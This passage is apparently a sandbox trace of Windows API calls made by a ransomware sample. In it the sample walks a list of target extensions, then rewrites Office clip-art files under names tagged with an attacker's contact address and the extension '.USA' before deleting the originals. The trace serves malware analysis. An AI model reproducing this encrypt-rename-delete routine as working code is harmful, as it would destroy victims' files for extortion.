(lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.512] lstrlenW (lpString=".ppt") returned 4 [0273.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.512] lstrlenW (lpString=".zip") returned 4 [0273.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.512] lstrlenW (lpString=".rar") returned 4 [0273.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.512] lstrlenW (lpString=".bz2") returned 4 [0273.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString=".7z") returned 3 [0273.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString=".dbf") returned 4 [0273.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString=".1cd") returned 4 [0273.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString=".jpg") returned 4 [0273.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString=".doc") returned 4 [0273.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString=".docx") returned 5 [0273.513] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.513] lstrlenW (lpString=".pdf") returned 4 [0273.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString=".xls") returned 4 [0273.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.513] lstrlenW (lpString=".xlsx") returned 5 [0273.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.513] lstrlenW (lpString=".ppt") returned 4 [0273.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.513] lstrlenW (lpString=".zip") returned 4 [0273.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.513] lstrlenW (lpString=".rar") returned 4 [0273.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.514] lstrlenW (lpString=".bz2") returned 4 [0273.514] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.514] lstrlenW (lpString=".7z") returned 3 [0273.514] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.514] lstrlenW (lpString=".dbf") returned 4 [0273.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.514] lstrlenW (lpString=".1cd") returned 4 [0273.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned 63 [0273.514] lstrlenW (lpString=".jpg") returned 4 [0273.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.514] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.514] lstrlenW (lpString="J0089945.WMF") returned 12 [0273.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.514] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=19898) returned 1 [0273.514] CloseHandle (hObject=0x388) returned 1 [0273.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf")) returned 0x20 [0273.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.515] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.515] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.515] GetLastError () returned 0x0 [0273.515] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x4dba, lpOverlapped=0x0) returned 1 [0273.517] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x4dc0, lpOverlapped=0x0) returned 1 [0273.518] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.518] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.518] SetEndOfFile (hFile=0x2bc) returned 1 [0273.518] CloseHandle (hObject=0x2bc) returned 1 [0273.518] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.518] SetEndOfFile (hFile=0x388) returned 1 [0273.520] CloseHandle (hObject=0x388) returned 1 [0273.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf")) returned 1 [0273.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.521] lstrlenW (lpString=".doc") returned 4 [0273.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString=".docx") returned 5 [0273.521] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0273.521] lstrlenW (lpString=".pdf") returned 4 [0273.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString=".xls") returned 4 [0273.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.521] lstrlenW (lpString=".xlsx") returned 5 [0273.521] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0273.521] lstrlenW (lpString=".ppt") returned 4 [0273.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.521] lstrlenW (lpString=".zip") returned 4 [0273.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.521] lstrlenW (lpString=".rar") returned 4 [0273.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString=".bz2") returned 4 [0273.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString=".7z") returned 3 [0273.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.521] lstrlenW (lpString=".dbf") returned 4 [0273.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.521] lstrlenW (lpString=".1cd") returned 4 [0273.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.522] lstrlenW (lpString=".jpg") returned 4 [0273.522] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.522] lstrlenW (lpString=".doc") returned 4 [0273.522] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString=".docx") returned 5 [0273.522] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0273.522] lstrlenW (lpString=".pdf") returned 4 [0273.522] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString=".xls") returned 4 [0273.522] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.522] lstrlenW (lpString=".xlsx") returned 5 [0273.522] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0273.522] lstrlenW (lpString=".ppt") returned 4 [0273.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.522] lstrlenW (lpString=".zip") returned 4 [0273.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.522] lstrlenW (lpString=".rar") returned 4 [0273.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString=".bz2") returned 4 [0273.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString=".7z") returned 3 [0273.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.522] lstrlenW (lpString=".dbf") returned 4 [0273.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.523] lstrlenW (lpString=".1cd") returned 4 [0273.523] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63 [0273.523] lstrlenW (lpString=".jpg") returned 4 [0273.523] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.523] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.523] lstrlenW (lpString="J0089992.WMF") returned 12 [0273.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.523] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=15680) returned 1 [0273.523] CloseHandle (hObject=0x388) returned 1 [0273.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf")) returned 0x20 [0273.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.524] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.524] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.524] GetLastError () returned 0x0 [0273.524] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x3d40, lpOverlapped=0x0) returned 1 [0273.526] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x3d50, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x3d50, lpOverlapped=0x0) returned 1 [0273.527] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.527] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.527] SetEndOfFile (hFile=0x2bc) returned 1 [0273.527] CloseHandle (hObject=0x2bc) returned 1 [0273.527] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.527] SetEndOfFile (hFile=0x388) returned 1 [0273.529] CloseHandle (hObject=0x388) returned 1 [0273.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf")) returned 1 [0273.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.529] lstrlenW (lpString=".doc") returned 4 [0273.529] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.529] lstrlenW (lpString=".docx") returned 5 [0273.529] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0273.529] lstrlenW (lpString=".pdf") returned 4 [0273.529] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.529] lstrlenW (lpString=".xls") returned 4 [0273.529] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.529] lstrlenW (lpString=".xlsx") returned 5 [0273.529] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0273.529] lstrlenW (lpString=".ppt") returned 4 [0273.529] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.529] lstrlenW (lpString=".zip") returned 4 [0273.530] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.530] lstrlenW (lpString=".rar") returned 4 [0273.530] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString=".bz2") returned 4 [0273.530] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString=".7z") returned 3 [0273.530] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString=".dbf") returned 4 [0273.530] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString=".1cd") returned 4 [0273.530] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString=".jpg") returned 4 [0273.530] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString=".doc") returned 4 [0273.530] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString=".docx") returned 5 [0273.530] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0273.530] lstrlenW (lpString=".pdf") returned 4 [0273.530] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString=".xls") returned 4 [0273.530] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.530] lstrlenW (lpString=".xlsx") returned 5 [0273.530] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0273.530] lstrlenW (lpString=".ppt") returned 4 [0273.530] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.530] lstrlenW (lpString=".zip") returned 4 [0273.531] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.531] lstrlenW (lpString=".rar") returned 4 [0273.531] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.531] lstrlenW (lpString=".bz2") returned 4 [0273.531] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.531] lstrlenW (lpString=".7z") returned 3 [0273.531] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.531] lstrlenW (lpString=".dbf") returned 4 [0273.531] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.531] lstrlenW (lpString=".1cd") returned 4 [0273.531] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63 [0273.531] lstrlenW (lpString=".jpg") returned 4 [0273.531] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.531] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=21268) returned 1 [0273.531] CloseHandle (hObject=0x388) returned 1 [0273.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf")) returned 0x20 [0273.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.532] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.532] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.532] GetLastError () returned 0x0 [0273.532] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x5314, lpOverlapped=0x0) returned 1 [0273.534] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x5320, lpOverlapped=0x0) returned 1 [0273.535] ReadFile (in: hFile=0x388, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.535] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.535] SetEndOfFile (hFile=0x2bc) returned 1 [0273.535] CloseHandle (hObject=0x2bc) returned 1 [0273.535] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.535] SetEndOfFile (hFile=0x388) returned 1 [0273.537] CloseHandle (hObject=0x388) returned 1 [0273.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf")) returned 1 [0273.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString=".doc") returned 4 [0273.538] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString=".docx") returned 5 [0273.538] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0273.538] lstrlenW (lpString=".pdf") returned 4 [0273.538] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString=".xls") returned 4 [0273.538] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.538] lstrlenW (lpString=".xlsx") returned 5 [0273.538] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0273.538] lstrlenW (lpString=".ppt") returned 4 [0273.538] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString=".zip") returned 4 [0273.538] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.538] lstrlenW (lpString=".rar") returned 4 [0273.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString=".bz2") returned 4 [0273.538] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString=".7z") returned 3 [0273.538] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString=".dbf") returned 4 [0273.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63 [0273.538] lstrlenW (lpString=".1cd") returned 4 [0273.538] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.538] lstrlenW (lpString="C:\\Program Files\\Microsoft 